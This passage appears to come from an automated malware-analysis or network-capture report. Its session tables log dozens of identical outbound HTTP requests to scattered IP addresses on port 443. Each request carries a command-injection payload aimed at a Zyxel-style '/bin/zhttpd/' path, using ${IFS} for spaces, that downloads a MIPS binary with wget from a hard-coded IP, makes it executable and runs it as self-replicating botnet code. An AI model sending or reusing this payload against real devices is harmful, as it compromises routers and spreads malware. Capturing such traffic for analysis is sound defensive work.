                                                Jan 12, 2024 18:24:55.336882114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9386192.168.2.134860838.185.128.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.336920977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9387192.168.2.1343088202.101.62.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.336983919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9388192.168.2.1349730161.191.235.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.337030888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9389192.168.2.135571457.49.10.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.337089062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9390192.168.2.135343290.234.243.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.337109089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9391192.168.2.134718282.21.28.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.337161064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9392192.168.2.1357710200.45.140.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.337183952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9393192.168.2.135141447.231.87.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.337198019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9394192.168.2.1337858141.80.117.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.337244034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9395192.168.2.135648471.50.13.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.337282896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9396192.168.2.1348660200.255.150.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.337306976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9397192.168.2.135041441.61.63.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.337368965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9398192.168.2.1353408130.227.121.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.337378979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9399192.168.2.133518469.197.119.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.337430000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9400192.168.2.1337544222.90.29.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.337465048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9401192.168.2.1355332112.179.115.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.337490082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9402192.168.2.135205442.186.145.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.337549925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9403192.168.2.135421053.75.100.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.337598085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9404192.168.2.134570497.228.226.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.337629080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9405192.168.2.1348144182.217.102.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.337680101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9406192.168.2.1358498187.89.9.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.337712049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9407192.168.2.1360448168.144.109.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.337743044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9408192.168.2.1349564166.216.222.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.337774992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9409192.168.2.13494825.77.9.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.337831020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9410192.168.2.1335462191.222.229.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.337847948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9411192.168.2.1334100190.159.193.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.337881088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9412192.168.2.1337090190.209.219.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.337917089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9413192.168.2.1341582205.184.140.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.337956905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9414192.168.2.135776060.254.55.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.337996960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9415192.168.2.133590488.134.68.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.338078022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9416192.168.2.135987224.176.203.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.338161945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9417192.168.2.1358634120.8.113.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.338186979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9418192.168.2.1356896105.83.231.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.338324070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9419192.168.2.1357656144.26.74.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.338340998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9420192.168.2.1348376218.163.44.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.338370085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9421192.168.2.1356310212.39.41.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.338411093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9422192.168.2.135856283.228.148.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.338449955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9423192.168.2.1334970142.150.108.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.338475943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9424192.168.2.134887676.24.42.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.338531017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9425192.168.2.133383279.24.211.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.338593006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9426192.168.2.1357868184.40.101.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.338639021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9427192.168.2.135561884.169.139.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.338681936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9428192.168.2.1357324174.88.172.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.338718891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9429192.168.2.133427845.37.233.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.338759899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9430192.168.2.135492660.178.69.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.338813066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9431192.168.2.135294446.41.78.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.338852882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9432192.168.2.135705887.165.198.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.338903904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9433192.168.2.1356502115.126.153.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.338933945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9434192.168.2.134536495.236.200.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.338963985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9435192.168.2.1342298105.88.170.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.339020014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9436192.168.2.1347308174.72.88.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.339066982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9437192.168.2.1341876124.0.17.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.339111090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9438192.168.2.1349648218.38.213.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.339154005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9439192.168.2.135558273.150.178.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.339186907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9440192.168.2.135381834.157.175.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.339216948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9441192.168.2.13341945.166.217.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.339282990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9442192.168.2.133284017.208.134.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.339322090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9443192.168.2.1356376112.128.216.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.339339018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9444192.168.2.1359434132.66.34.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.339401007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9445192.168.2.133762479.102.134.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.339445114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9446192.168.2.136024212.242.100.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.339487076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9447192.168.2.1351292103.171.42.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.339540005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9448192.168.2.135637018.57.196.216443
                                                TimestampBytes transferredDirectionData
